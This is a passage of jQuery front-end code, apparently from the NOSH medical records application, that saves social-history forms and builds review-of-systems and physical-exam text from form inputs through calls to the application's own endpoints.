false, //resizable: false, //focus: function (event, ui) { //var id = $("#textdump_group_id").val(); //if (id != '') { //$("#"+id).focus(); //} //}, //close: function (event, ui) { //$("#textdump_group_target").val(''); //$("#textdump_group_add").val(''); //$("#textdump_group_html").html(''); //} //}); //$("#restricttextgroup_dialog").dialog({ //bgiframe: true, //autoOpen: false, //height: 200, //width: 400, //draggable: false, //resizable: false, //closeOnEscape: false, //dialogClass: "noclose", //close: function (event, ui) { //$("#restricttextgroup_form").clearForm(); //}, //buttons: { //'Save': function() { //var str = $("#restricttextgroup_form").serialize(); //$.ajax({ //type: "POST", //url: "ajaxsearch/restricttextgroup-save", //data: str, //success: function(data){ //$.jGrowl(data); //$("#restricttextgroup_dialog").dialog('close'); //} //}); //}, //Cancel: function() { //$("#restricttextgroup_dialog").dialog('close'); //} //} //}); //$("#textdump").dialog({ //bgiframe: true, //autoOpen: false, //height: 300, //width: 400, //draggable: false, //resizable: false, //closeOnEscape: false, //dialogClass: "noclose", //close: function (event, ui) { //$("#textdump_target").val(''); //$("#textdump_input").val(''); //$("#textdump_add").val(''); //$("#textdump_group_item").val(''); //$("#textdump_html").html(''); //}, //buttons: [{ //text: 'Save', //id: 'textdump_dialog_save', //class: 'nosh_button_save', //click: function() { //var id = $("#textdump_target").val(); //var old = $("#"+id).val(); //var delimiter = $("#textdump_delimiter1").val(); //var input = ''; //var text = []; //$("#textdump_html").find('.textdump_item').each(function() { //if ($(this).find(':first-child').hasClass("ui-state-error") == true) { //var a = $(this).text(); //text.push(a); //} //}); //if (old != '') { //input += old + '\n' + $("#textdump_group_item").val() + ": "; //} else { //input += $("#textdump_group_item").val() + ": "; //} //input += text.join(delimiter); //$("#"+id).val(input); //$("#textdump").dialog('close'); //} //},{ //text: 'Cancel', //id: 'textdump_dialog_cancel', //class: 'nosh_button_cancel', //click: function() { //$("#textdump").dialog('close'); //} //}] //}); //$("#textdump_specific").dialog({ //bgiframe: true, //autoOpen: false, //height: 300, //width: 400, //draggable: false, //resizable: false, //closeOnEscape: false, //dialogClass: "noclose", //close: function (event, ui) { //$("#textdump_specific_target").val(''); //$("#textdump_specific_start").val(''); //$("#textdump_specific_length").val(''); //$("#textdump_specific_origin").val(''); //$("#textdump_specific_add").val(''); //$("#textdump_specific_html").html(''); //$("#textdump_specific_save").show(); //$("#textdump_specific_cancel").show(); //$("#textdump_specific_done").show(); //$("#textdump_delimiter_div").show(); //}, //buttons: [{ //text: 'Save', //id: 'textdump_specific_save', //class: 'nosh_button_save', //click: function() { //var origin = $("#textdump_specific_origin").val(); //if (origin != 'configure') { //var id = $("#textdump_specific_target").val(); //var start = $("#textdump_specific_start").val(); //var length = $("#textdump_specific_length").val(); //var delimiter = $("#textdump_delimiter").val(); //var text = []; //$("#textdump_specific_html").find('.textdump_item_specific').each(function() { //if ($(this).find(':first-child').hasClass("ui-state-error") == true) { //var a = $(this).text(); //text.push(a); //} //}); //var input = text.join(delimiter); //$("#"+id).textrange('set', start, length); //$("#"+id).textrange('replace', input); //} //$("#textdump_specific").dialog('close'); //} //},{ //text: 'Cancel', //id: 'textdump_specific_cancel', //class: 'nosh_button_cancel', //click: function() { //$("#textdump_specific").dialog('close'); //} //},{ //text: 'Done', //id: 'textdump_specific_done', //class: 'nosh_button_check', //click: function() { //$("#textdump_specific").dialog('close'); //} //}] //}); //$("#textdump_group_html").tooltip(); //$("#textdump_html").tooltip(); //$("#textdump_hint").tooltip({ //content: function(callback) { //var ret = ''; //$.ajax({ //type: "POST", //url: "ajaxdashboard/listmacros", //success: function(data){ //callback(data); //} //}); //}, //position: { my: "left bottom+15", at: "left top", collision: "flipfit" }, //open: function (event, ui) { //setTimeout(function() { //$(ui.tooltip).hide('explode'); //}, 6000); //}, //track: true //}); //$("#template_encounter_edit_dialog").dialog({ //bgiframe: true, //autoOpen: false, //height: 400, //width: 600, //closeOnEscape: false, //dialogClass: "noclose", //close: function(event, ui) { //$('#template_encounter_edit_form').clearForm(); //$('#template_encounter_edit_div').empty(); //reload_grid("encounter_templates_list"); //if ($("#template_encounter_dialog").dialog("isOpen")) { //$.ajax({ //type: "POST", //url: "ajaxencounter/get-encounter-templates", //dataType: "json", //success: function(data){ //$("#template_encounter_choose").removeOption(/./); //if(data.response == true){ //$("#template_encounter_choose").addOption(data.message, false); //} else { //$("#template_encounter_choose").addOption({"":"No encounter templates"}, false); //} //} //}); //} //}, //buttons: { //'Add Field': function() { //var a = $("#template_encounter_edit_div > :last-child").attr("id"); //if (a == 'encounter_template_grid_label') { //var count = 0; //} else { //var a1 = a.split("_"); //var count = parseInt(a1[4]) + 1; //} //$("#template_encounter_edit_div").append('<div id="group_encounter_template_div_'+count+'" class="pure-u-1-3"><select name="group[]" id="encounter_template_group_id_'+count+'" class="text encounter_template_group_group" style="width:95%"></select></div><div id="array_encounter_template_div_'+count+'" class="pure-u-1-3"><select name="array[]" id="encounter_template_array_id_'+count+'" class="text" style="width:95%"></select></div><div id="remove_encounter_template_div_'+count+'" class="pure-u-1-3"><button type="button" id="remove_encounter_template_field_'+count+'" class="remove_encounter_template_field nosh_button_cancel">Remove Field</button></div>'); //if (a == 'encounter_template_grid_label') { //var b = $("#template_encounter_edit_dialog_encounter_template").val(); //$.ajax({ //type: "POST", //url: "ajaxsearch/get-template-fields/" + b, //dataType: "json", //success: function(data){ //$("#encounter_template_group_id_"+count).addOption({'':'Choose Field'}, false); //$("#encounter_template_group_id_"+count).addOption(data, false); //$("#encounter_template_group_id_"+count).focus(); //loadbuttons(); //} //}); //} else { //$("#encounter_template_group_id_0").copyOptions("#encounter_template_group_id_"+count, "all"); //$("#encounter_template_group_id_"+count).val($("#encounter_template_group_id_"+count+" option:first").val()) //$("#encounter_template_group_id_"+count).focus(); //loadbuttons(); //} //}, //'Save': function() { //var bValid = true; //$("#template_encounter_edit_form").find("[required]").each(function() { //var input_id = $(this).attr('id'); //var id1 = $("#" + input_id); //var text = $("label[for='" + input_id + "']").html(); //bValid = bValid && checkEmpty(id1, text); //}); //if (bValid) { //var str = $("#template_encounter_edit_form").serialize(); //if(str){ //$('#dialog_load').dialog('option', 'title', "Saving template...").dialog('open'); //$.ajax({ //type: "POST", //url: "ajaxsearch/save-encounter-templates", //data: str, //success: function(data){ //$('#dialog_load').dialog('close'); //if (data == 'There is already a template with the same name!') { //$.jGrowl(data); //$("#encounter_template_name_text").addClass("ui-state-error"); //} else { //$.jGrowl(data); //$('#template_encounter_edit_dialog').dialog('close'); //} //} //}); //} else { //$.jGrowl("Please complete the form"); //} //} //}, //Cancel: function() { //$('#template_encounter_edit_dialog').dialog('close'); //} //} //}); //$("#timeline_dialog").dialog({ //bgiframe: true, //autoOpen: false, //height: 500, //width: 650, //draggable: false, //resizable: false, //open: function(event, ui) { //}, //close: function(event, ui) { //$("#timeline").html(''); //}, //position: { my: 'center', at: 'center', of: '#maincontent' } //}); }); $(document).on("click", "#encounter_panel", function() { noshdata.encounter_active = 'y'; openencounter(); $("#nosh_chart_div").hide(); $("#nosh_encounter_div").show(); }); $(document).on("click", ".ui-jqgrid-titlebar", function() { $(".ui-jqgrid-titlebar-close", this).click(); }); $(document).on('click', '#save_oh_sh_form', function(){ var old = $("#oh_sh").val(); var old1 = old.trim(); var a = $("#sh1").val(); var b = $("#sh2").val(); var c = $("#sh3").val(); var d = $("#oh_sh_marital_status").val(); var d0 = $("#oh_sh_marital_status_old").val(); var e = $("#oh_sh_partner_name").val(); var e0 = $("#oh_sh_partner_name").val(); var f = $("#sh4").val(); var g = $("#sh5").val(); var h = $("#sh6").val(); var i = $("#sh7").val(); var j = $("#sh8").val(); var k = $("input[name='sh9']:checked").val(); var l = $("input[name='sh10']:checked").val(); var m = $("input[name='sh11']:checked").val(); if(a){ var a1 = 'Family members in the household: ' + a + '\n'; } else { var a1 = ''; } if(b){ var b1 = 'Children: ' + b + '\n'; } else { var b1 = ''; } if(c){ var c1 = 'Pets: ' + c + '\n'; } else { var c1 = ''; } if(d){ var d1 = 'Marital status: ' + d + '\n'; } else { var d1 = ''; } if(e){ var e1 = 'Partner name: ' + e + '\n'; } else { var e1 = ''; } if(f){ var f1 = 'Diet: ' + f + '\n'; } else { var f1 = ''; } if(g){ var g1 = 'Exercise: ' + g + '\n'; } else { var g1 = ''; } if(h){ var h1 = 'Sleep: ' + h + '\n'; } else { var h1 = ''; } if(i){ var i1 = 'Hobbies: ' + i + '\n'; } else { var i1 = ''; } if(j){ var j1 = 'Child care arrangements: ' + j + '\n'; } else { var j1 = ''; } if(k){ var k1 = k + '\n'; } else { var k1 = ''; } if(l){ var l1 = l + '\n'; } else { var l1 = ''; } if(m){ var m1 = m + '\n'; } else { var m1 = ''; } var full = d1+e1+a1+b1+c1+f1+g1+h1+i1+j1+k1+l1+m1; var full1 = full.trim(); if (old1 != '') { var n = old1+'\n'+full1+'\n'; } else { var n = full1+'\n'; } var o = n.length; $("#oh_sh").val(n).caret(o); if(d != d0 || e != e0) { $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/sh", data: "marital_status=" + d + "&partner_name=" + e, success: function(data){ $.jGrowl(data); } }); } var sh9_y = $('#sh9_y').attr('checked'); var sh9_n = $('#sh9_n').attr('checked'); if(sh9_y){ $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/sex", data: "status=yes", success: function(data){ $.jGrowl(data); } }); } if(sh9_n){ $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/sex", data: "status=no", success: function(data){ $.jGrowl(data); } }); } }); $(document).on("click", '#save_oh_etoh_form', function(){ var old = $("#oh_etoh").val(); var old1 = old.trim(); var a = $("input[name='oh_etoh_select']:checked").val(); var a0 = $("#oh_etoh_text").val(); if(a){ var a1 = a + a0; } else { var a1 = ''; } if (old1 != '') { var b = old1+'\n'+a1+'\n'; } else { var b = a1+'\n'; } var c = b.length; $("#oh_etoh").val(b).caret(c); }); $(document).on('click', '#save_oh_tobacco_form', function(){ var old = $("#oh_tobacco").val(); var old1 = old.trim(); var a = $("input[name='oh_tobacco_select']:checked").val(); var a0 = $("#oh_tobacco_text").val(); if(a){ var a1 = a + a0; } else { var a1 = ''; } if (old1 != '') { var b = old1+'\n'+a1+'\n'; } else { var b = a1+'\n'; } var c = b.length; $("#oh_tobacco").val(b).caret(c); var tobacco_y = $('#oh_tobacco_y').prop('checked'); var tobacco_n = $('#oh_tobacco_n').prop('checked'); if(tobacco_y){ $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/tobacco", data: "status=yes", success: function(data){ $.jGrowl(data); } }); } if(tobacco_n){ $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/tobacco", data: "status=no", success: function(data){ $.jGrowl(data); } }); } }); $(document).on('click', '#save_oh_drugs_form', function(){ var old = $("#oh_drugs").val(); var old1 = old.trim(); var a = $("input[name='oh_drugs_select']:checked").val(); if(a){ if (a == 'No illicit drug use.') { var a1 = a; } else { var a0 = $("#oh_drugs_text").val(); var a2 = $("#oh_drugs_text1").val(); var a1 = a + a0 + '\nFrequency of drug use: ' + a2; $('#oh_drugs_input').hide(); $('#oh_drugs_text').val(''); $("#oh_drugs_text1").val(''); $("input[name='oh_drugs_select']").each(function(){ $(this).prop('checked', false); }); $('#oh_drugs_form input[type="radio"]').button('refresh'); } } else { var a1 = ''; $('#oh_drugs_input').hide(); } if (old1 != '') { var b = old1+'\n'+a1+'\n'; } else { var b = a1+'\n'; } var c = b.length; $("#oh_drugs").val(b).caret(c); }); $(document).on('click', '#save_oh_employment_form', function(){ var old = $("#oh_employment").val(); var old1 = old.trim(); var a = $("input[name='oh_employment_select']:checked").val(); var b = $("#oh_employment_text").val(); var c = $("#oh_employment_employer").val(); var c0 = $("#oh_employment_employer_old").val(); if(a){ var a1 = a + '\n'; } else { var a1 = ''; } if(b){ var b1 = 'Employment field: ' + b + '\n'; } else { var b1 = ''; } if(c){ var c1 = 'Employer: ' + c + '\n'; } else { var c1 = ''; } var full = a1+b1+c1; var full1 = full.trim(); if (old1 != '') { var d = old1+'\n'+full1+'\n'; } else { var d = full1+'\n'; } var e = d.length; $("#oh_employment").val(d).caret(e); if(c != c0){ $.ajax({ type: "POST", url: "ajaxencounter/edit-demographics/employer", data: "employer=" + c, success: function(data){ $.jGrowl(data); } }); } }); function updateTextArea(parent_id_entry) { var newtext = ''; $('#' + parent_id_entry + '_form :checked').each(function() { newtext += $(this).val() + ' '; }); $('#' + parent_id_entry).val(newtext); } function ros_normal(parent_id) { var id = parent_id; var x = parent_id.length - 1; parent_id = parent_id.slice(0,x); $("#" + id).siblings('input:checkbox').each(function(){ var parent_id = $(this).attr("id"); $(this).prop('checked',false); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var a = $(this).val(); remove_text(parent_id_entry,a,'',false); if (parts[1] == 'wccage') { $("#ros_wcc_age_form input:checkbox").button('refresh'); } else { $("#" + parent_id_entry + "_form input:checkbox").button('refresh'); } }); $("#" + parent_id + "_div").find('.ros_detail_text').each(function(){ var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = ' ' + $(this).val(); remove_text(parent_id_entry,a,'',false); $(this).hide(); }); } function ros_other(parent_id) { var x = parent_id.length - 1; parent_id = parent_id.slice(0,x); $("#" + parent_id + "_div").find('.ros_normal:checkbox').each(function(){ var parent_id = $(this).attr("id"); $(this).prop('checked',false); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = $(this).val(); remove_text(parent_id_entry,a,'',false); if (parts[1] == 'wccage') { $("#ros_wcc_age_form input:checkbox").button('refresh'); } else { $("#" + parent_id_entry + "_form input:checkbox").button('refresh'); } }); } $(document).on("click", '.ros_template_div input[type="checkbox"]', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var label = parts[0] + '_' + parts[1] + '_' + parts[2] + '_label'; var label_text = $("#" + label).text() + ': '; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); var repeat = repeat_text(parent_id_entry,a,label_text); if ($(this).prop('checked') && repeat !== true) { if (old != '') { var comma = a.charAt(0); var old_arr = old.split(' '); var new_arr = search_array(old_arr, label_text); if (new_arr.length > 0 && label_text != ': ') { var arr_index = old_arr.indexOf(new_arr[0]); a = a.replace(label_text, '; '); old_arr[arr_index] += a; } else { old_arr.push(a); } var b = old_arr.join(" "); } else { var b = a; } $("#" + parent_id_entry).val(b); if ($(this).is('.ros_normal')) { ros_normal(parent_id); } else { ros_other(parent_id); } } else { if (label_text == ': ') { label_text = ''; } remove_text(parent_id_entry,a,label_text,false); } }); $(document).on("click", '.ros_template_div input[type="radio"]', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = $(this).val(); var repeat = repeat_text(parent_id_entry,a,''); console.log(repeat); if ($(this).prop('checked') && repeat !== true) { if (old != '') { $(this).siblings('input:radio').each(function() { var d = $(this).val(); var d1 = ' ' + d; old = old.replace(d1,''); old = old.replace(d, ''); }); if (old != '') { var b = old + ' ' + a; } else { var b = a; } } else { var b = a; } $("#" + parent_id_entry).val(b); } else { remove_text(parent_id_entry,a,'',false); } }); $(document).on("change", '.ros_template_div select', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = $(this).val(); if (old != '') { $(this).siblings('option').each(function() { var d = $(this).val(); var d1 = ' ' + d; old = old.replace(d1,''); old = old.replace(d, ''); }); var b = old + ' ' + a; } else { var b = a; } $("#" + parent_id_entry).val(b); }); $(document).on('focus', '.ros_template_div input[type="text"]', function() { noshdata.old_text = $(this).val(); }); $(document).on('focusout', '.ros_template_div input[type="text"]', function() { var a = $(this).val(); if (a != noshdata.old_text) { if (a != '') { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var x = parent_id.length - 1; var parent_div = parent_id.slice(0,x); var start1 = $("#" + parent_div + "_div").find('span:first').text(); if (start1 == '') { start1 = $("#" + parts[0] + '_' + parts[1] + '_' + parts[2] + '_label').text(); } var start1_n = start1.lastIndexOf(' ('); if (start1_n != -1) { var start1_n1 = start1.substring(0,start1_n); var start1_n2 = start1_n1.toLowerCase(); } else { var start1_n1 = start1; var start1_n2 = start1; } var start2 = $("label[for='" + parent_id + "']").text(); var start3_n = start1.lastIndexOf('degrees'); if (start3_n != -1) { var end_text = ' degrees.'; } else { var end_text = ''; } var start4 = $(this).closest('div.ui-accordion').find('h3.ui-state-active').text(); if (start4 != '') { var start4_n = start4.lastIndexOf('-'); if (start4_n != -1) { var parts2 = start4.split(' - '); var mid_text = ', ' + parts2[1].toLowerCase(); } else { var mid_text = ', ' + start4.toLowerCase(); } } else { var mid_text = ''; } if (!!start2) { var start_text = start2 + ' ' + start1_n2; } else { var start_text = start1_n1; } var old = $("#" + parent_id_entry).val(); var a_pointer = a.length - 1; var a_pointer2 = a.lastIndexOf('.'); if (!!old) { if (!!start_text) { var c = start_text + mid_text + ': ' + a + end_text; if (noshdata.old_text != '') { var c_old = start_text + mid_text + ': ' + noshdata.old_text + end_text; } } else { if (a_pointer != a_pointer2) { var c = a + '.'; } else { var c = a; } } if (noshdata.old_text != '') { var old_text_pointer = noshdata.old_text.length - 1; var old_text_pointer2 = noshdata.old_text.lastIndexOf('.'); if (old_text_pointer != old_text_pointer2) { var old_text1 = noshdata.old_text + '.'; } else { var old_text1 = noshdata.old_text; } if (!!start_text) { var b = old.replace(c_old, c); } else { var b = old.replace(old_text1, c); } noshdata.old_text = ''; } else { var b = old + ' ' + c; } } else { if (!!start_text) { var b = start_text + mid_text + ': ' + a + end_text; } else { if (a_pointer != a_pointer2) { var b = a + '.'; } else { var b = a; } } } $("#" + parent_id_entry).val(b); } } }); $(document).on('click', '.ros_template_div .ros_detail', function() { var detail_id = $(this).attr("id") + '_detail'; if ($(this).prop('checked')) { $('#' + detail_id).show('fast'); $('#' + detail_id).focus(); } else { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wccage') { var parent_id_entry = 'ros_wcc'; } else { var parent_id_entry = parts[0] + '_' + parts[1]; } var old = $("#" + parent_id_entry).val(); var a = ' ' + $('#' + detail_id).val(); var a1 = a + ' '; var c = old.replace(a1,''); c = c.replace(a, ''); $("#" + parent_id_entry).val(c); $('#' + detail_id).hide('fast'); } }); $(document).on("click", '.all_normal', function(){ var a = $(this).prop('checked'); var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); if (parts[1] == 'wcc') { if(a){ $("#ros_wcc_form").find("input.ros_normal:checkbox").each(function(){ $(this).prop("checked",true); }); $("#ros_wcc_age_form").find("input.ros_normal:checkbox").each(function(){ $(this).prop("checked",true); }); var newtext = ''; $('#ros_wcc_form :checked').each(function() { newtext += $(this).val() + ' '; }); $('#ros_wcc_age_form :checked').each(function() { newtext += $(this).val() + ' '; }); $('#ros_wcc').val(newtext); } else { $("#ros_wcc").val(''); $("#ros_wcc_form").find('input.ros_normal:checkbox').each(function(){ $(this).prop("checked",false); }); $("#ros_wcc_age_form").find('input.ros_normal:checkbox').each(function(){ $(this).prop("checked",false); }); } $('#ros_wcc_form input[type="checkbox"]').button('refresh'); $('#ros_wcc_age_form input[type="checkbox"]').button('refresh'); } else { var parent_id_entry = parts[0] + '_' + parts[1]; if(a){ $("#" + parent_id_entry + "_form").find("input.ros_normal:checkbox").each(function(){ $(this).prop("checked",true); }); updateTextArea(parent_id_entry); } else { $("#" + parent_id_entry).val(''); $("#" + parent_id_entry + "_form").find('input.ros_normal:checkbox').each(function(){ $(this).prop("checked",false); }); } $("#" + parent_id_entry + '_form input[type="checkbox"]').button('refresh'); } }); $(document).on("click", '.all_normal1_ros', function(){ var a = $(this).prop('checked'); var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; $.ajax({ type: "POST", url: "ajaxencounter/all-normal/ros/" + parent_id_entry, dataType: 'json', success: function(data){ var message = ''; $.each(data, function(key, value){ if(a){ $("#" + key).val(value); message = "All normal values set!"; } else { $("#" + key).val(''); message = "All normal values cleared!"; } }); $.jGrowl(message); } }); }); function updateTextArea_pe(parent_id_entry) { var newtext = ''; $('#' + parent_id_entry + '_form :checked').each(function() { newtext += $(this).val() + ' '; }); $('#' + parent_id_entry).val(newtext); } function pe_normal(parent_id) { var id = parent_id; var x = parent_id.length - 1; parent_id = parent_id.slice(0,x); $("#" + id).siblings('input:checkbox').each(function() { var parent_id = $(this).attr("id"); $(this).prop('checked',false); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); remove_text(parent_id_entry,a,'',false); $(this).button('refresh'); }); $("#" + parent_id + "_div").find('.pe_detail_text').each(function(){ var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); if ($(this).val() != '') { var text_pointer = $(this).val().length - 1; var text_pointer2 = $(this).val().lastIndexOf('.'); if (text_pointer != text_pointer2) { var text1 = $(this).val() + '.'; } else { var text1 = $(this).val(); } var a = ' ' + text1; remove_text(parent_id_entry,a,'',false); } $(this).val(''); $(this).hide(); }); } function pe_other(parent_id) { var x = parent_id.length - 1; parent_id = parent_id.slice(0,x); $("#" + parent_id + "_div").find('.pe_normal:checkbox').each(function(){ var parent_id = $(this).attr("id"); $(this).prop('checked',false); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); remove_text(parent_id_entry,a,'',false); //var a1 = a + ' '; //var c = old.replace(a1,''); //c = c.replace(a, ''); //$("#" + parent_id_entry).val(c); $(this).button('refresh'); }); } $(document).on("click", '.pe_template_div input[type="checkbox"]', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var label = parts[0] + '_' + parts[1] + '_' + parts[2] + '_label'; var label_text = $("#" + label).text() + ': '; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); var repeat = repeat_text(parent_id_entry,a,label_text); if ($(this).is(':checked') && repeat !== true) { if (old != '') { var comma = a.charAt(0); var old_arr = old.split(' '); var new_arr = search_array(old_arr, label_text); if (new_arr.length > 0) { var arr_index = old_arr.indexOf(new_arr[0]); a = a.replace(label_text, '; '); old_arr[arr_index] += a; } else { old_arr.push(a); } var b = old_arr.join(" "); } else { var b = a; } $("#" + parent_id_entry).val(b); if ($(this).is('.pe_normal')) { pe_normal(parent_id); } else { pe_other(parent_id); } } else { remove_text(parent_id_entry,a,label_text,false); } }); $(document).on("change", '.pe_template_div input[type="radio"]', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); var repeat = repeat_text(parent_id_entry,a,''); if ($(this).is(':checked') && repeat !== true) { if (old != '') { $(this).siblings('input:radio').each(function() { var d = $(this).val(); var d1 = ' ' + d; old = old.replace(d1,''); old = old.replace(d, ''); }); if (old != '') { var b = old + ' ' + a; } else { var b = a; } } else { var b = a; } $("#" + parent_id_entry).val(b); } else { remove_text(parent_id_entry,a,'',false); } }); $(document).on("change", '.pe_template_div select', function() { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); var a = $(this).val(); if (old != '') { $(this).siblings('option').each(function() { var d = $(this).val(); var d1 = ' ' + d; old = old.replace(d1,''); old = old.replace(d, ''); }); var b = old + ' ' + a; } else { var b = a; } $("#" + parent_id_entry).val(b); }); $(document).on("focus", '.pe_template_div input[type="text"]', function() { noshdata.old_text = $(this).val(); }); $(document).on("focusout", '.pe_template_div input[type="text"]', function() { var a = $(this).val(); if (a != noshdata.old_text) { if (a != '') { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var x = parent_id.length - 1; var parent_div = parent_id.slice(0,x); var start1 = $("#" + parent_div + "_div").find('span:first').text(); if (start1 == '') { start1 = $("#" + parts[0] + '_' + parts[1] + '_' + parts[2] + '_label').text(); } var start1_n = start1.lastIndexOf(' ('); if (start1_n != -1) { var start1_n1 = start1.substring(0,start1_n); var start1_n2 = start1_n1.toLowerCase(); } else { var start1_n1 = start1; var start1_n2 = start1; } var start2 = $("label[for='" + parent_id + "']").text(); var start3_n = start1.lastIndexOf('degrees'); if (start3_n != -1) { var end_text = ' degrees.'; } else { var end_text = ''; } var start4 = $(this).closest('div.ui-accordion').find('h3.ui-state-active').text(); if (start4 != '') { var start4_n = start4.lastIndexOf('-'); if (start4_n != -1) { var parts2 = start4.split(' - '); var mid_text = ', ' + parts2[1].toLowerCase(); } else { var mid_text = ', ' + start4.toLowerCase(); } } else { var mid_text = ''; } if (!!start2) { var start_text = start2 + ' ' + start1_n2; } else { var start_text = start1_n1; } var old = $("#" + parent_id_entry).val(); var a_pointer = a.length - 1; var a_pointer2 = a.lastIndexOf('.'); if (!!old) { if (!!start_text) { var c = start_text + mid_text + ': ' + a + end_text; if (noshdata.old_text != '') { var c_old = start_text + mid_text + ': ' + noshdata.old_text + end_text; } } else { if (a_pointer != a_pointer2) { var c = a + '.'; } else { var c = a; } } if (noshdata.old_text != '') { var old_text_pointer = noshdata.old_text.length - 1; var old_text_pointer2 = noshdata.old_text.lastIndexOf('.'); if (old_text_pointer != old_text_pointer2) { var old_text1 = noshdata.old_text + '.'; } else { var old_text1 = noshdata.old_text; } if (!!start_text) { var b = old.replace(c_old, c); } else { var b = old.replace(old_text1, c); } noshdata.old_text = ''; } else { var b = old + ' ' + c; } } else { if (!!start_text) { var b = start_text + mid_text + ': ' + a + end_text; } else { if (a_pointer != a_pointer2) { var b = a + '.'; } else { var b = a; } } } $("#" + parent_id_entry).val(b); } } }); $(document).on("click", '.pe_template_div .pe_detail', function() { var detail_id = $(this).attr("id") + '_detail'; if ($(this).is(':checked')) { $('#' + detail_id).show('fast'); $('#' + detail_id).focus(); } else { var parent_id = $(this).attr("id"); var parts = parent_id.split('_'); var parent_id_entry = parts[0] + '_' + parts[1]; var old = $("#" + parent_id_entry).val(); if ($('#' + detail_id).val() != '') { var text_pointer = $('#' + detail_id).val().length - 1; var text_pointer2 = $('#' + detail_id).val().lastIndexOf('.'); if (text_pointer != text_pointer2) { var text1 = $('#' + detail_id).val() + '.'; } else { var text1 = $('#' + detail_id).val(); } var a = ' ' + text1; var a1 = a + ' '; var c = old.replace(a1,''); c = c.replace(a, ''); $("#" + parent_id_entry).val(c); } $('#' + detail_id).val(''); $('#' + detail_id).hide('fast'); } }); $(document).on("click", '.all_normal_pe', function(){ var a = $(this).is(':checked'); var parent_id = $(this).attr("id"); var n = parent_id.lastIndexOf('_'); var parent_id_entry = parent_id.substring(0,n); if(a){ $("#" + parent_id_entry + "_form").find("input.pe_normal:checkbox").each(function(){ $(this).prop("checked",true); }); updateTextArea_pe(parent_id_entry); } else { $("#" + parent_id_entry).val(''); $("#" + parent_id_entry + "_form").find('input.pe_normal:checkbox').each(function(){ $(this).prop("checked",false); }); } $("#" + parent_id_entry + '_form input[type="checkbox"]').button('refresh'); }); $(document).on("click", '.all_normal1_pe', function(){ var a = $(this).is(':checked'); var parent_id = $(this).attr("id"); var parent_id_entry = parent_id.replace('normal','dialog'); if(a){ $("#" + parent_id_entry).find(".all_normal_pe").each(function(){ $(this).prop("checked",true); var parent_id1 = $(this).attr("id"); var n1 = parent_id1.lastIndexOf('_'); var parent_id_entry1 = parent_id1.substring(0,n1); $("#" + parent_id_entry1 + "_form").find("input.pe_normal:checkbox").each(function(){ $(this).prop("checked",true); }); updateTextArea_pe(parent_id_entry1); $("#" + parent_id_entry1 + '_form input[type="checkbox"]').button('refresh'); }).button('refresh'); $("#" + parent_id_entry).find(".all_normal2_pe").each(function(){ $(this).prop("checked",true); var parent_id2 = $(this).attr("id"); var parent_id_entry2 = parent_id2.replace('_normal1',''); var old2 = $("#" + parent_id_entry2).val(); var a2 = $(this).val(); if (old2 != '') { var b2 = old2 + ' ' + a2; } else { var b2 = a2; } $("#" + parent_id_entry2).val(b2); }).button('refresh'); } else { $("#" + parent_id_entry).find(".all_normal_pe").each(function(){ $(this).prop("checked",false); var parent_id2 = $(this).attr("id"); var n2 = parent_id2.lastIndexOf('_'); var parent_id_entry2 = parent_id2.substring(0,n2); $("#" + parent_id_entry2).val(''); $("#" + parent_id_entry2 + "_form").find('input.pe_normal:checkbox').each(function(){ $(this).prop("checked",false); }); $("#" + parent_id_entry2 + '_form input[type="checkbox"]').button('refresh'); }).button('refresh'); $("#" + parent_id_entry).find(".all_normal2_pe").each(function(){ $(this).prop("checked",true); var parent_id2 = $(this).attr("id"); var parent_id_entry2 = parent_id2.replace('_normal1',''); var old2 = $("#" + parent_id_entry2).val(); var a2 = $(this).val(); var a3 = ' ' + a2; var c2 = old2.replace(a3,''); 